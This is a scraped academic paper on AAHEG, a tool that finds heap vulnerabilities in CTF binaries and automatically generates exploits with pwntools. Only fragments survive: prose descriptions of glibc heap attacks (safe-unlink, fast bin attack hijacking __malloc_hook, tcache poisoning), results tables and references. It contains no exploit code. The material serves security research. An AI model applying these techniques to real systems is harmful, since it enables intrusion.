AAHEG: Automatic Advanced Heap Exploit Generation Based on Abstract Syntax Tree
<p>The heap structure in glibc.</p> "> Figure 2
<p>Heap-related vulnerability.</p> "> Figure 3
<p>Overview of AAHEG.</p> "> Figure 4
<p>The function primitive to extract in binary files.</p> "> Figure 5
<p>The Leak Libc AST through UAF vulnerability.</p> "> Figure 6
<p>The Leak Libc AST through Heap Overflow vulnerability.</p> "> Figure 7
<p>The Hijack Hooks AST through UAF vulnerability.</p> "> Figure 8
<p>The Hijack Hooks AST through Heap Overflow vulnerability.</p> "> Figure 9
<p>The Hijack Hooks AST through Off by Null vulnerability.</p> "> Figure 10
<p>The Leak Libc AST through UAF vulnerability with bypassing tcache.</p> "> Figure 11
<p>The flow chart of AAHEG.</p> ">
Abstract
:1. Introduction
- AAHEG applies symbolic execution technology to automatically collect information in binary files without the need for a PoC or source code. AAHEG automatically detects heap-related vulnerabilities (Heap Overflow, Off by One, Off by Null and Use After Free) existing in binary files.
- By sorting out the current advanced exploitation methods of heap-related vulnerabilities targeting the Linux heap management mechanism glibc, and combining it with our daily attack experience, we extracted the vulnerability exploitation abstract syntax tree (AST) for each exploitation method. AAHEG will combine the protection mechanisms enabled, control flow graph (CFG) information in functions, and heap-related primitives in the binary file, and then select the appropriate exploit and complete the final exploit generation.
- AAHEG will eventually generate a file-form exploit based on the pwntools [12] tool to support subsequent expert research. At the same time, AAHEG will also use binary files and a remote docker for testing to verify the correctness of the generated exploit. Experimental results show that AAHEG can complete vulnerability detection and exploit generation for 20 Capture The Flag (CTF) binary files, 11 of which have the protection mechanism fully enabled.
2. Related Work
2.1. Automatic Exploit Generation
2.2. Heap-Related Vulnerability and Heap-Related Exploit
- prev_size. If the heap block before the physical address is in use, then this field has no meaning and can be used to store the data of the previous heap block; if the heap block before the physical address is not in use, then this field will be used to store the previous heap block’s size.
- size. The size of the current heap block, of which the lower 3 bits are A, M, and P from high to low. A represents NON_mainarena, indicating whether the current heap block belongs to the main thread, where 0 means it belongs, and 1 means it does not belong; M means whether the current heap block is allocated by the mmap system call, 1 means it is allocated by the mmap system call [36] and 0 means not by the mmap system call(brk system call). P indicates whether the previous heap block is in use, 1 indicates that it is in use, and 0 indicates that it is not in use.
- fd/bk(forward/backward).If a heap block is in use, starting from fd, it is the data controlled by the user. If a heap block is not in use, then fd/bk will be used to save information related to the linked lists. fd represents the previous heap block (released before). bk represents the last heap block (released later). The order here is different between the fast bin chain and the tcache bin chain because the fast bin chain and the tcache bin chain use a single linked list structure (first in last out(FILO)). fd/bk is the core attack area for heap utilization. The attack targets of unlink, fast bin attack, and unsorted bin attack are all fd/bk area.
- fd_nextsize/bk_nextsize.These two fields will only be used in large bins. In heap exploitation, only large bin attack will attack these two fields.
- Unlink. Unlink is the oldest attack method. The first ones proposed were [37,38]. Unlink mainly uses heap-related vulnerabilities to overwrite linked-list-related data in the heap and then remove the heap blocks from the doubly linked list. When the link is broken, any address will be written. In 2004, a patch was proposed for this attack that detected link integrity in doubly linked lists, making the attack difficult to exploit.
- Safe-unlink [39]. The Safe-unlink method overwrites the fd and bk of a certain heap block P to ptr – 0x18 and ptr – 0x10 (ptr is the address of a pointer pointing to P) by laying out the heap block in advance, and then triggers the unlink mechanism of glibc. The ultimate goal of Safe-unlink is to write to an arbitrary address, and the condition is that the address of ptr needs to be known in advance, which means that the binary file needs to not have the PIE protection mechanism turned on.
- Fast bin attack [40]. The basic goal of fast bin attack is to modify the fd of a heap block that is already in the fast bin chain and then allocate two heap blocks of the same size. The basic goal of fast bin attack is to hijack __malloc_hook into one_gadget [41]. After that, we can hijack the control flow of the program.
- Tcache positioning [40]. Tcache is a mechanism added after Ubuntu 17.10 (glibc 2.26). It is mainly used to improve the efficiency of heap block allocation during program running. Tcache and fast bin are similar in data structure. Tcache poisoning refers to modifying the fd in the tcache chunk (heap block in the glibc heap manager) to the target. Tcache poisoning is an attack method of writing fd of chunk in the tcache bin, similar to fast bin attack.
- Unsorted bin attack [40]. The basic goal of the unsorted bin attack is to modify the bk of a heap block already in the unsorted bin chain to the target address–0x10 (64 bit). After the modified unsorted bin is allocated, the target address will be written as main_arena + 88 (a large value), unsorted bin attack is difficult to hijack control flow and needs to be coordinated with other exploitation methods.
- The House of Series. The House of series was first proposed by Phantasmagoria in The Malloc Maleficarum [42]. In The Malloc Maleficarum, five glibc attack methods including The House of Force were proposed. This naming method also affected subsequent naming methods for new exploits of glibc’s heap manager, such as The House of Orange and The House of Rabbit.
3. Overview of AAHEG
3.1. Modules in AAHEG
- Static analysis of binary files. The work to be carried out by static analysis of binary files is information collection. The work of information collection is to collect the protection mechanisms enabled in the binary file, such as whether PIE is enabled.
- Primitive extraction. There are several aspects of primitive extraction including extraction of branch paths, conditions, and primitive grammar. Branch path extraction refers to extracting the conditions for reaching the malloc, free, and other functions. Simply put, primitive grammar is to determine the parameter range of functions’ parameters such as heap block writing size, storage address, and other information in the malloc function.
- Vulnerability analyzer. The vulnerability analyzer will solve the constraints of vulnerability based on the conditions existing in the primitive extracted before. For example, if you want to determine whether there is a Heap Overflow vulnerability, you need to determine whether the size written to a heap block after the malloc function exceeds its size malloc before. And it can be judged by the primitive grammar extracted before.
- Exploit generator. The exploit generator will automatically search for an AST path that can successfully exploit the vulnerabilities found by the vulnerability analyzer. The ASTs are constructed based on experts’ experience. The exploit generator collects protection mechanism information, generates the final exploit based on the abstract syntax tree, and verifies that the condition can be satisfied by the SMT solver.
- Exploit verifier. The main work of the exploit verifier is to verify whether the vulnerability generated by the exploit generator can obtain the permissions of the target host. In AAHEG, the exploit verifier will automatically run a process or automatically start a remote docker to simulate the remote environment. If the exploit generator can successfully obtain the permissions of the target host, then the exploit verification is successful, otherwise, the exploit verification fails.
- File-form exploit generator. File-form exploit generator will generate exploit files based on pwntools. First, a Python-based function is generated based on the primitive grammar, and then the code for the corresponding function is generated based on the AST branch selected by the exploit generator, and finally a complete exploit is generated. The file-form exploit generated is in Python language and it has a built-in gdb debugger to help experts do subsequent verification and analysis.
3.2. Attack Model
3.3. Overview
4. Primitive Extraction
- Constraint path extraction. AAHEG will first extract the constraint path, i.e., the path conditions from the entire binary file to each branch. The condition in Figure 4 has two main tasks. One is to perform the control flow graph (CFG) in the program. After analysis, the exit point of the branch statement that generates the switch case is extracted, which corresponds to the exit node of CFG. When extracting the exit node, you also need to prune the default branch of the switch statement or the error-reporting branch. The pruning method is to detect whether internal functions are called (external functions are puts or printf). Then, Angr [43], a symbolic execution tool, is used to solve the constraints of the corresponding branch path.
- Function analysis. The second step of primitive extraction is to conduct an automated analysis of the function’s functionality. The first step in automated analysis is to judge the List pointer. AAHEG will automatically search the .bss segment and other global segments to find the addresses indexed by the above functions (Add, Edit, etc.) and determine that this may be a List pointer. AAHEG uses two-way confirmation, i.e., after finding the possible List pointer, it continues to search for the possible Add function and finds the relevant address where malloc saves the return value in the Add function (determined based on the distance between the addresses, or based on the parameters) to determine whether it is an Add function and whether it is a List pointer. After the List pointer is determined, its content is determined based on the characteristics of other functions. For example, there is a call of the free function in Free, and the parameters of the free function are related to the List pointer; Edit does not call malloc, but the relevant address saved in the List is Write; the Show function will use some output functions to print the address related to the List.
- Constraint paths correspond to functions. After extracting the corresponding constraint path and the corresponding function name, AAHEG will match these function names with paths and record them as the conditions of the function. Specifically, the information we want to extract here is the corresponding relationship in Figure 4. Entering 1 will enter the Add function, and entering 2 will enter the Edit function.
- Key parameter information extraction. In AAHEG, the work of this step is to determine whether there is this parameter and the specific range of this parameter. For example, in the Add function, the specific value of index will be detected to determine its range. The detection here is based on the location where the last malloc return value is saved. The next step is to determine the value range of the malloc parameter. The range here is determined directly by hooking the malloc function and using the SMT solver in Angr. After the function reaches the malloc function, its parameters will be probed to obtain their minimum and maximum values.
5. Vulnerability Detection
6. Exploit Abstract Syntax Tree
- p = chunk_at_offset(p, -((long) prevsize));
- if (__glibc_unlikely (chunksize(p) != prevsize))
- malloc_printerr (“corrupted size vs. prev_size while consolidating”);
- Sequence type (S): Sequence type, which means that these two operations are executed sequentially, i.e., executed one after another, and the left subtree precedes the right subtree.
- Multiplication type (M): Multiplication type, representing the number of times the right subtree repeats the left subtree operation.
- Conditions (C): Condition type, which means that when performing the operation of the left subtree, the conditions of the right subtree must be met.
7. Exploit Generation
- Mark the elements in the generated payload and mark the address information that needs to be known in advance when instantiating it.
- The preamble payload is responsible for leaking information that subsequent payloads need to know in advance. If the required address information is not known when the payload is instantiated, the payload will fail to instantiate and need to be regenerated.
8. Evaluation
8.1. Experimental Setup
8.2. CTF Benchmark Evaluation
9. Discussion
9.1. Limitations
9.2. Future Work
9.3. Related Work
10. Conclusions
Author Contributions
Funding
Data Availability Statement
Conflicts of Interest
References
- Song, J.; Alves-Foss, J. The DARPA Cyber Grand Challenge: A Competitor’s Perspective. IEEE Secur. Priv. 2015, 13, 72–76. [Google Scholar] [CrossRef]
- Huang, S.; Huang, M.; Huang, P.; Lai, C.; Lu, H.; Leong, W. CRAX: Software Crash Analysis for Automatic Exploit Generation by Modeling Attacks as Symbolic Continuations. In Proceedings of the Sixth International Conference on Software Security and Reliability, SERE 2012, Gaithersburg, MD, USA, 20–22 June 2012; Volume 2012, pp. 78–87. [Google Scholar] [CrossRef]
- Cha, S.K.; Avgerinos, T.; Rebert, A.; Brumley, D. Unleashing Mayhem on Binary Code. In Proceedings of the IEEE Symposium on Security and Privacy, SP 2012, San Francisco, CA, USA, 21–23 May 2012; pp. 380–394. [Google Scholar] [CrossRef]
- Kc, G.S.; Keromytis, A.D. e-NeXSh: Achieving an Effectively Non-Executable Stack and Heap via System-Call Policing. In Proceedings of the 21st Annual Computer Security Applications Conference (ACSAC 2005), Tucson, AZ, USA, 5–9 December 2005; pp. 286–302. [Google Scholar] [CrossRef]
- Xu, S.; Wang, Y. BofAEG: Automated Stack Buffer Overflow Vulnerability Detection and Exploit Generation Based on Symbolic Execution and Dynamic Analysis. Secur. Commun. Netw. 2022, 2022, 1251987. [Google Scholar] [CrossRef]
- Mow, W.; Huang, S.; Hsiao, H. LAEG: Leak-based AEG using Dynamic Binary Analysis to Defeat ASLR. In Proceedings of the IEEE Conference on Dependable and Secure Computing, DSC 2022, Edinburgh, UK, 22–24 June 2022; pp. 1–8. [Google Scholar] [CrossRef]
- Wang, Y.; Zhang, C.; Xiang, X.; Zhao, Z.; Li, W.; Gong, X.; Liu, B.; Chen, K.; Zou, W. Revery: From Proof-of-Concept to Exploitable. In Proceedings of the 2018 ACM SIGSAC Conference on Computer and Communications Security, CCS 2018, Toronto, ON, Canada, 15–19 October 2018; Lie, D., Mannan, M., Backes, M., Wang, X., Eds.; ACM: New York, NY, USA, 2018; pp. 1914–1927. [Google Scholar] [CrossRef]
- Wang, Y.; Zhang, C.; Zhao, Z.; Zhang, B.; Gong, X.; Zou, W. MAZE: Towards Automated Heap Feng Shui. In Proceedings of the 30th USENIX Security Symposium, USENIX Security 2021, Online, 11–13 August 2021; Bailey, M., Greenstadt, R., Eds.; USENIX Association: Berkeley, CA, USA, 2021; pp. 1647–1664. [Google Scholar]
- Position-Independent Code. Available online: https://en.wikipedia.org/wiki/Position-independent_code (accessed on 30 October 2023).
- Bierbaumer, B.; Kirsch, J.; Kittel, T.; Francillon, A.; Zarras, A. Smashing the Stack Protector for Fun and Profit. In Proceedings of the 24th IFIP World Computer Congress, WCC 2018, Poznan, Poland, 18–20 September 2018; Janczewski, L.J., Kutylowski, M., Eds.; Springer: Berlin/Heidelberg, Germany, 2018; Volume 529, pp. 293–306. [Google Scholar] [CrossRef]
- FULL RELRO. Available online: https://www.redhat.com/en/blog/hardening-elf-binaries-using-relocation-read-onlyrelro (accessed on 30 October 2023).
- Pwntools. CTF Framework and Exploit Development Library. 2020. Available online: https://github.com/Gallopsled/pwntools (accessed on 1 December 2023).
- Wang, R.; Pan, Z.; Shi, F.; Zhang, M. Aemb: An automated exploit mitigation bypassing solution. Appl. Sci. 2021, 11, 9727. [Google Scholar] [CrossRef]
- He, L.; Cai, Y.; Hu, H.; Su, P.; Liang, Z.; Yang, Y.; Huang, H.; Yan, J.; Jia, X.; Feng, D. Automatically assessing crashes from heap overflows. In Proceedings of the 32nd IEEE/ACM International Conference on Automated Software Engineering, ASE 2017, Urbana, IL, USA, 30 October–3 November 2017; Rosu, G., Penta, M.D., Nguyen, T.N., Eds.; IEEE Computer Society: Washington, DC, USA, 2017; pp. 274–279. [Google Scholar] [CrossRef]
- Avgerinos, T.; Cha, S.K.; Rebert, A.; Schwartz, E.J.; Woo, M.; Brumley, D. Automatic exploit generation. Commun. ACM 2014, 57, 74–84. [Google Scholar] [CrossRef]
- Huang, N.; Huang, S.; Chang, C. Analysis to heap overflow exploit in linux with symbolic execution. In IOP Conference Series: Earth and Environmental Science; IOP Publishing: Bristol, UK, 2019; Volume 252, p. 042100. [Google Scholar]
- Zhao, Z.; Wang, Y.; Gong, X. HAEPG: An Automatic Multi-hop Exploitation Generation Framework. In Proceedings of the Detection of Intrusions and Malware, and Vulnerability Assessment—17th International Conference, DIMVA 2020, Lisbon, Portugal, 24–26 June 2020; Maurice, C., Bilge, L., Stringhini, G., Neves, N., Eds.; Springer: Berlin/Heidelberg, Germany, 2020; Volume 12223, pp. 89–109. [Google Scholar] [CrossRef]
- Sotirov, A. Heap feng shui in javascript. Black Hat Eur. 2007, 2007, 11–20. [Google Scholar]
- Yun, I.; Kapil, D.; Kim, T. Automatic Techniques to Systematically Discover New Heap Exploitation Primitives. In Proceedings of the 29th USENIX Security Symposium, USENIX Security 2020, Boston, MA, USA, 12–14 August 2020; Capkun, S., Roesner, F., Eds.; USENIX Association: Berkeley, CA, USA, 2020; pp. 1111–1128. [Google Scholar]
- Zhang, B.; Chen, J.; Li, R.; Feng, C.; Li, R.; Tang, C. Automated Exploitable Heap Layout Generation for Heap Overflows Through Manipulation Distance-Guided Fuzzing. In Proceedings of the 32nd USENIX Security Symposium, USENIX Security 2023, Anaheim, CA, USA, 9–11 August 2023; Calandrino, J.A., Troncoso, C., Eds.; USENIX Association: Berkeley, CA, USA, 2023; pp. 4499–4515. [Google Scholar]
- Heelan, S.; Melham, T.; Kroening, D. Automatic Heap Layout Manipulation for Exploitation. In Proceedings of the 27th USENIX Security Symposium, USENIX Security 2018, Baltimore, MD, USA, 15–17 August 2018; Enck, W., Felt, A.P., Eds.; USENIX Association: Berkeley, CA, USA, 2018; pp. 763–779. [Google Scholar]
- Gennissen, J.; O’Keeffe, D. Hack the Heap: Heap Layout Manipulation made Easy. In Proceedings of the 43rd IEEE Security and Privacy, SP Workshops 2022, San Francisco, CA, USA, 22–26 May 2022; pp. 289–300. [Google Scholar] [CrossRef]
- Li, R.; Zhang, B.; Chen, J.; Lin, W.; Feng, C.; Tang, C. Towards Automatic and Precise Heap Layout Manipulation for General-Purpose Programs. In Proceedings of the 30th Annual Network and Distributed System Security Symposium, NDSS 2023, San Diego, CA, USA, 27 February–3 March 2023. [Google Scholar]
- Kang, X.; Debray, S. A Framework for Automatic Exploit Generation for JIT Compilers. In Proceedings of the Checkmate@CCS 2021, Research on offensive and defensive techniques in the Context of Man at the End (MATE) Attacks, Virtual Event, Republic of Korea, 19 November 2021; Hauser, C., Kwon, Y., Banescu, S., Eds.; ACM: New York, NY, USA, 2021; pp. 11–19. [Google Scholar] [CrossRef]
- Jin, L.; Cao, Y.; Chen, Y.; Zhang, D.; Campanoni, S. ExGen: Cross-platform, Automated Exploit Generation for Smart Contract Vulnerabilities. IEEE Trans. Dependable Secur. Comput. 2023, 20, 650–664. [Google Scholar] [CrossRef]
- Krupp, J.; Rossow, C. teEther: Gnawing at Ethereum to Automatically Exploit Smart Contracts. In Proceedings of the 27th USENIX Security Symposium, USENIX Security 2018, Baltimore, MD, USA, 15–17 August 2018; Enck, W., Felt, A.P., Eds.; USENIX Association: Berkeley, CA, USA, 2018; pp. 1317–1333. [Google Scholar]
- Huang, S.; Huang, M.; Huang, P.; Lu, H.; Lai, C. Software Crash Analysis for Automatic Exploit Generation on Binary Programs. IEEE Trans. Reliab. 2014, 63, 270–289. [Google Scholar] [CrossRef]
- Jiang, Z.; Zhang, Y.; Xu, J.; Sun, X.; Liu, Z.; Yang, M. AEM: Facilitating Cross-Version Exploitability Assessment of Linux Kernel Vulnerabilities. In Proceedings of the 44th IEEE Symposium on Security and Privacy, SP 2023, San Francisco, CA, USA, 21–25 May 2023; pp. 2122–2137. [Google Scholar] [CrossRef]
- Wu, W.; Chen, Y.; Xu, J.; Xing, X.; Gong, X.; Zou, W. FUZE: Towards Facilitating Exploit Generation for Kernel Use-After-Free Vulnerabilities. In Proceedings of the 27th USENIX Security Symposium, USENIX Security 2018, Baltimore, MD, USA, 15–17 August 2018; Enck, W., Felt, A.P., Eds.; USENIX Association: Berkeley, CA, USA, 2018; pp. 781–797. [Google Scholar]
- Feng, Z.; Guo, D.; Tang, D.; Duan, N.; Feng, X.; Gong, M.; Shou, L.; Qin, B.; Liu, T.; Jiang, D.; et al. CodeBERT: A Pre-Trained Model for Programming and Natural Languages. In Proceedings of the Findings of the Association for Computational Linguistics: EMNLP 2020, Online Event, 16–20 November 2020; Cohn, T., He, Y., Liu, Y., Eds.; Association for Computational Linguistics: Toronto, ON, Canada, 2020; Volume EMNLP 2020, pp. 1536–1547. [Google Scholar] [CrossRef]
- Liguori, P.; Al-Hossami, E.; Cotroneo, D.; Natella, R.; Cukic, B.; Shaikh, S. Can we generate shellcodes via natural language? An empirical study. Autom. Softw. Eng. 2022, 29, 30. [Google Scholar] [CrossRef]
- Yang, G.; Chen, X.; Zhou, Y.; Yu, C. DualSC: Automatic Generation and Summarization of Shellcode via Transformer and Dual Learning. In Proceedings of the IEEE International Conference on Software Analysis, Evolution and Reengineering, SANER 2022, Honolulu, HI, USA, 15–18 March 2022; pp. 361–372. [Google Scholar] [CrossRef]
- Liguori, P.; Al-Hossami, E.; Orbinato, V.; Natella, R.; Shaikh, S.; Cotroneo, D.; Cukic, B. EVIL: Exploiting Software via Natural Language. In Proceedings of the 32nd IEEE International Symposium on Software Reliability Engineering, ISSRE 2021, Wuhan, China, 25–28 October 2021; Jin, Z., Li, X., Xiang, J., Mariani, L., Liu, T., Yu, X., Ivaki, N., Eds.; IEEE: Piscataway, NJ, USA, 2021; pp. 321–332. [Google Scholar] [CrossRef]
- Yang, G.; Zhou, Y.; Chen, X.; Zhang, X.; Han, T.; Chen, T. ExploitGen: Template-augmented exploit code generation based on CodeBERT. J. Syst. Softw. 2023, 197, 111577. [Google Scholar] [CrossRef]
- Gloger, W. Ptmalloc. 2006. Available online: https://github.com/hustfisher/ptmalloc/blob/master/malloc.c (accessed on 1 December 2023).
- Linux Manual Page. 2023. Available online: https://man7.org/linux/man-pages/man2/syscalls.2.html (accessed on 1 December 2023).
- MaXX. Vudo—An Object Superstitiously Believed to Embody Magical Powers. 2001. Available online: http://phrack.org/issues/57/8.html (accessed on 1 December 2023).
- Once upon a Free(). 2001. Available online: http://phrack.org/issues/57/9.html (accessed on 1 December 2023).
- Mandt, T. Kernel Pool Exploitation on Windows 7. 2011. Available online: https://media.blackhat.com/bh-dc-11/Mandt/BlackHat_DC_2011_Mandt_kernelpool-wp.pdf (accessed on 1 December 2023).
- Karimi, A. A Survey of Heap-Exploitation Techniques. 2021. Available online: https://www.researchgate.net/profile/Alireza-Karimi-31/publication/369594354_A_survey_of_heap-exploitation_techniques/links/6423d78392cfd54f84388e5b/A-survey-of-heap-exploitation-techniques.pdf (accessed on 1 December 2023).
- david942j. One_Gadget. 2023. Available online: https://github.com/david942j/one_gadget/releases (accessed on 1 December 2023).
- Phantasmagoria, P. The Malloc Maleficarum. Bugtraq Mailinglist 2005. Available online: https://dl.packetstormsecurity.net/papers/attack/MallocMaleficarum.txt (accessed on 1 December 2023).
- Wang, F.; Shoshitaishvili, Y. Angr—The Next Generation of Binary Analysis. In Proceedings of the IEEE Cybersecurity Development, SecDev 2017, Cambridge, MA, USA, 24–26 September 2017; pp. 8–9. [Google Scholar] [CrossRef]
- Radareorg. Radare2. 2023. Available online: https://github.com/radareorg/radare2 (accessed on 1 December 2023).
- Ctftime. Available online: https://ctftime.org/ (accessed on 1 December 2023).
- Tu, H. Boosting Symbolic Execution for Heap-based Vulnerability Detection and Exploit Generation. In Proceedings of the 45th IEEE/ACM International Conference on Software Engineering: ICSE 2023 Companion Proceedings, Melbourne, Australia, 14–20 May 2023; pp. 218–220. [Google Scholar] [CrossRef]
- Liu, J.; An, H.; Li, J.; Liang, H. Detecting Exploit Primitives Automatically for Heap Vulnerabilities on Binary Programs. arXiv 2022, arXiv:2212.13990. [Google Scholar] [CrossRef]
- Heelan, S.; Melham, T.; Kroening, D. Gollum: Modular and Greybox Exploit Generation for Heap Overflows in Interpreters. In Proceedings of the 2019 ACM SIGSAC Conference on Computer and Communications Security, CCS 2019, London, UK, 11–15 November 2019; Cavallaro, L., Kinder, J., Wang, X., Katz, J., Eds.; ACM: New York, NY, USA, 2019; pp. 1689–1706. [Google Scholar] [CrossRef]
- Heelan, S.; Melham, T.; Kroening, D. Heap Layout Optimisation for Exploitation (Technical Report). Available online: https://www.blackhat.com/docs/eu-17/materials/eu-17-Heelan-Heap-Layout-Optimisation-For-Exploitation-wp.pdf (accessed on 10 December 2023).
- Eckert, M.; Bianchi, A.; Wang, R.; Shoshitaishvili, Y.; Kruegel, C.; Vigna, G. HeapHopper: Bringing Bounded Model Checking to Heap Implementation Security. In Proceedings of the 27th USENIX Security Symposium, USENIX Security 2018, Baltimore, MD, USA, 15–17 August 2018; Enck, W., Felt, A.P., Eds.; USENIX Association: Berkeley, CA, USA, 2018; pp. 99–116. [Google Scholar]
Exploit Method | Feature | Type | Applicable Version | Protection Mechanism Bypass |
---|---|---|---|---|
Safe-unlink | Arbitrary address writing | Linked-list attack | Any version | NX, Canary, ASLR |
fast bin attack | Control flow hijacking | Linked-list attack | Ubuntu version ≤ 20.04 (glibc version ≤ 2.31) | NX, PIE, Canary, ASLR |
Tcahe poisoning | Arbitrary address writing/Control flow hijacking | Linked-list attack | Ubuntu version ≥ 18.04 (glibc version ≥ 2.27) | NX, PIE, Canary, ASLR |
Unsorted bin attack | Write a large value at arbitrary address | Linked-list attack | Ubuntu version ≤ 18.04 (glibc version ≤ 2.27) | NX, PIE, Canary, ASLR |
Function Name | Index | Size | Content | Main Functions |
---|---|---|---|---|
Add | Optional | Dynamic/Fixed | Dynamic | Allocate a heap block |
Edit | Dynamic | Optional | Dynamic | Modify the content of a heap block |
Show | Dynamic | No | No | Print the content of a heap block |
Free | Dynamic | No | No | Free a heap block |
Binary Name | Vuln Type | N | C | P | R | Advanced Exploit Technique | Exploit | T(s) |
---|---|---|---|---|---|---|---|---|
2019_5thspace_final_pwn1 | UAF | ✓ | ✓ | ✓ | F | Tcache poisoning | L + R | 32 |
2020_diaoyucheng_very_easy | UAF | ✓ | ✓ | ✓ | F | Tcache poisoning | L + R | 50 |
2020_tiesan_fake | UAF | ✓ | ✓ | × | P | Safe-unlink | L + R | 25 |
2020_wangding_magic | UAF | ✓ | ✓ | × | P | Safe-unlink | L + R | 37 |
2023_longjian_14 | UAF | ✓ | ✓ | ✓ | F | Tcache poisoning | L + R | 41 |
2023_longjian_8 | UAF | ✓ | ✓ | × | P | Safe-unlink | L + R | 47 |
2017_RCTF_RNote | Off by One | ✓ | × | × | P | Safe-unlink | L + R | 57 |
2018_0ctfquals_babyheap | Off by One | ✓ | ✓ | ✓ | F | Fast bin attack | L + R | 78 |
2019_roarctf_easy_pwn | Off by One | ✓ | ✓ | ✓ | F | Tcache poisoning | L + R | 63 |
2023_longjian_16 | Off by Null | ✓ | ✓ | ✓ | F | Tcache poisoning | L + R | 23 |
2018_LCTF_easy_heap | Off by Null | ✓ | ✓ | ✓ | F | Tcache poisoning | L + R | 73 |
2018_qctf_babyheap | Off by Null | ✓ | ✓ | ✓ | F | Fast bin attack | L + R | 76 |
2018_rctf_babyheap | Off by Null | ✓ | ✓ | ✓ | F | Fast bin attack | L + R | 88 |
2019_5thspace_pwn12 | Off by Null | ✓ | ✓ | × | F | Safe-unlink | L + R | 42 |
2019_5thspace_pwn14 | Off by Null | ✓ | ✓ | × | P | Safe-unlink | L + R | 31 |
2019_swamp_dream_heaps | Off by Null | ✓ | ✓ | × | P | Safe-unlink | L + R | 54 |
2019_CISCN_pwn8 | Heap Overflow | ✓ | ✓ | × | P | Safe-unlink | L + R | 24 |
2019_qiangwang_AP | Heap Overflow | ✓ | ✓ | ✓ | F | Tcache poisoning | L + R | 51 |
2020_diaoyucheng_unknown | Heap Overflow | ✓ | ✓ | ✓ | F | Tcache poisoning | L + R | 34 |
2021_longjing_hellocat | Heap Overflow | ✓ | ✓ | × | P | Safe-unlink | L + R | 49 |
Disclaimer/Publisher’s Note: The statements, opinions and data contained in all publications are solely those of the individual author(s) and contributor(s) and not of MDPI and/or the editor(s). MDPI and/or the editor(s) disclaim responsibility for any injury to people or property resulting from any ideas, methods, instructions or products referred to in the content. |
© 2023 by the authors. Licensee MDPI, Basel, Switzerland. This article is an open access article distributed under the terms and conditions of the Creative Commons Attribution (CC BY) license (https://creativecommons.org/licenses/by/4.0/).
Share and Cite
Wang, Y.; Zhang, Y.; Li, Z. AAHEG: Automatic Advanced Heap Exploit Generation Based on Abstract Syntax Tree. Symmetry 2023, 15, 2197. https://doi.org/10.3390/sym15122197
Wang Y, Zhang Y, Li Z. AAHEG: Automatic Advanced Heap Exploit Generation Based on Abstract Syntax Tree. Symmetry. 2023; 15(12):2197. https://doi.org/10.3390/sym15122197
Chicago/Turabian StyleWang, Yu, Yipeng Zhang, and Zhoujun Li. 2023. "AAHEG: Automatic Advanced Heap Exploit Generation Based on Abstract Syntax Tree" Symmetry 15, no. 12: 2197. https://doi.org/10.3390/sym15122197
APA StyleWang, Y., Zhang, Y., & Li, Z. (2023). AAHEG: Automatic Advanced Heap Exploit Generation Based on Abstract Syntax Tree. Symmetry, 15(12), 2197. https://doi.org/10.3390/sym15122197